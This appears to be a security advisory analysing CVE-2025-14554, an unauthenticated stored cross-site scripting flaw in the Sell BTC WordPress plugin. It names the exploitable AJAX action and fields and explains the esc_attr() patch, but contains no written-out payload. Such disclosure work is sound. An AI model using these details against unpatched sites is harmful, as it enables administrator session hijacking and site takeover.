– Proof of Concept - Atomic Edge

Atomic Edge analysis of CVE-2025-14554:
The Sell BTC – Cryptocurrency Selling Calculator WordPress plugin contains an unauthenticated stored cross-site scripting vulnerability in versions up to and including 1.5. The vulnerability exists in the order data display functionality within the admin dashboard, allowing attackers to inject malicious scripts that execute when administrators view the Orders page. This vulnerability received a CVSS score of 7.2 (High severity).

The root cause is insufficient output escaping when rendering user-supplied order data in the plugin’s admin interface. The vulnerable code in sell-btc-by-hayyatapps/Pages/orders.php lines 27-35 and 46-53 directly concatenates user-controlled data from the $data array into HTML output without proper escaping. The affected fields include happs-FirstName, happs-LastName, happs-Email, happs-Phone, and several other order data fields. This lack of escaping allows JavaScript payloads to persist in the database and execute in the browser context of administrators viewing the orders.

Exploitation occurs via the ‘orderform_data’ AJAX action endpoint at /wp-admin/admin-ajax.php. Unauthenticated attackers can send POST requests with action=orderform_data containing malicious JavaScript payloads in any of the user-controlled fields. The plugin stores these values without proper sanitization. When an administrator accesses the Orders page in the WordPress admin dashboard (wp-admin/admin.php?page=sell-btc-orders), the malicious scripts execute in the administrator’s browser session, potentially leading to session hijacking or administrative account compromise.

The patch in version 1.6 adds WordPress esc_attr() function calls to all user-controlled data outputs in the orders.php file. Each concatenated data field now passes through esc_attr() before being inserted into HTML table cells and paragraph elements. This ensures that any HTML special characters, including angle brackets and quotes, are properly encoded as HTML entities, preventing script execution while preserving the data’s display value. The version number in sell-btc.php also increments from 1.5 to 1.6.

Successful exploitation allows unauthenticated attackers to execute arbitrary JavaScript in the context of WordPress administrators. This can lead to complete site compromise through session hijacking, administrative credential theft, backdoor installation via plugin/theme editing, or content manipulation. Attackers could also redirect administrators to phishing pages or perform actions on their behalf, potentially resulting in full control over the WordPress installation and associated data.